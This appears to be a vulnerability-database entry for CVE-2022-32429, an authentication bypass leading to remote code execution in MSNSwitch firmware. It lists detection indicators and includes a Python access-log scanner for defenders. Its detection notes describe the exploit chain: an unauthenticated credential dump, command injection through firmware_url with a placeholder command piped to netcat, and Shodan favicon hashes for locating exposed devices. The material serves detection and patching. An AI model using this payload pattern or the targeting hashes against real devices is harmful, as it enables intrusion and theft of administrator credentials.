CVE-2022-32429
published 2022-08-10


Priority: P1 87 critical
CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EXPLOIT
EPSS: 75.72% (99.5th percentile)
An authentication-bypass issue in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh of Mega System Technologies Inc MSNSwitch MNT.2408 allows unauthenticated attackers to arbitrarily configure settings within the application, leading to remote code execution.

Affected

1 ranges
Vendor | Product | Version range | Fixed in
megatech | msnswitch_firmware | |

Detection & IOCs (extracted from sources)

path: /cgi-bin-sdb/ExportSettings.sh
path: /goform/login
path: /saveUpgrade.asp
path: /cgi-bin/upgrade.cgi
other: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
yara: matchers: word body 'SSID1'; regex header 'filename="Settings(.*).dat' and 'application/octet-stream'; status 200
  • Unauthenticated GET request to /cgi-bin-hax/ExportSettings.sh or /cgi-bin-sdb/ExportSettings.sh — a 200 response containing 'SSID1' and a Content-Disposition header matching 'filename="Settings*.dat' with content-type 'application/octet-stream' confirms the auth-bypass credential dump.
  • RCE is triggered via a GET to /cgi-bin/upgrade.cgi with a crafted firmware_url parameter containing backtick-escaped OS commands piped to netcat (e.g., firmware_url=http://...`CMD|nc HOST PORT`/filename?).
  • Credential extraction: parse the unauthenticated ExportSettings.sh response for lines matching 'Account1=' and 'Password1=' to recover plaintext admin credentials.
  • CSRF token is extracted from /saveUpgrade.asp after authenticated login; look for the pattern '?csrftoken=' in the page body — its presence indicates the device is an MSNSwitch target.
  • Use Shodan favicon hashes to identify exposed MSNSwitch devices on the internet: http.favicon.hash:-2073748627 or http.favicon.hash:-1721140132.
  • The unauthenticated configuration dump (ExportSettings.sh) only requires HTTP access from any network, but the full RCE via upgrade.cgi requires the attacker to be on the same subnet as the device.
  • Two distinct vulnerable paths exist: /cgi-bin-sdb/ExportSettings.sh (referenced in the NVD advisory) and /cgi-bin-hax/ExportSettings.sh (used in the working exploit PoC); both should be blocked.
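
A defender-side check for the request patterns listed above, added here as an example (it is not from the original page or the vendor): it scans web access logs for hits on either ExportSettings.sh path and for upgrade.cgi requests whose firmware_url carries shell metacharacters. It assumes Apache/nginx "combined" log lines from a proxy or capture point in front of the switch; the sample log and the names `classify` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Both settings-export paths named on this page.
EXPORT_PATHS = {"/cgi-bin-sdb/ExportSettings.sh", "/cgi-bin-hax/ExportSettings.sh"}
UPGRADE_PATH = "/cgi-bin/upgrade.cgi"
# Shell metacharacters that have no place in a firmware download URL.
SHELL_META = re.compile(r"[`|;$]")
# Assumption: "combined" access-log format (source, timestamp, request line, status).
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges, placeholder command text).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Aug/2022:09:14:02 +0000] "GET /cgi-bin-sdb/ExportSettings.sh HTTP/1.1" 200 4312 "-" "curl/7.81.0"
198.51.100.7 - - [10/Aug/2022:09:14:05 +0000] "GET /cgi-bin-hax/ExportSettings.sh HTTP/1.1" 404 162 "-" "curl/7.81.0"
192.0.2.44 - - [10/Aug/2022:09:20:11 +0000] "GET /cgi-bin/upgrade.cgi?firmware_url=http://192.0.2.10/%60CMD%7Cnc%20HOST%20PORT%60/fw.bin HTTP/1.1" 200 88 "-" "-"
192.0.2.50 - - [10/Aug/2022:09:31:40 +0000] "GET /cgi-bin/upgrade.cgi?firmware_url=http://192.0.2.10/fw-1.2.bin HTTP/1.1" 200 88 "-" "-"
192.0.2.50 - - [10/Aug/2022:09:32:00 +0000] "GET /goform/login HTTP/1.1" 200 901 "-" "-"
"""

def classify(line):
    """Return (source, finding) for a suspicious request, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = unquote(url.path)  # catch percent-encoded spellings of the path
    if path in EXPORT_PATHS:
        # A 200 means the settings file (including credentials) was served.
        outcome = "served" if m["status"] == "200" else "attempted"
        return m["src"], f"settings-export {outcome}"
    if path == UPGRADE_PATH:
        # parse_qs percent-decodes values, so %60 and %7C surface as ` and |.
        for value in parse_qs(url.query).get("firmware_url", []):
            if SHELL_META.search(value):
                return m["src"], "upgrade.cgi firmware_url shell metacharacters"
    return None

def scan(text):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, text.splitlines()) if hit]

if __name__ == "__main__":
    for src, finding in scan(SAMPLE_LOG):
        print(f"{src}: {finding}")
```

A "served" finding means the exported settings, including the account password, should be treated as disclosed and rotated.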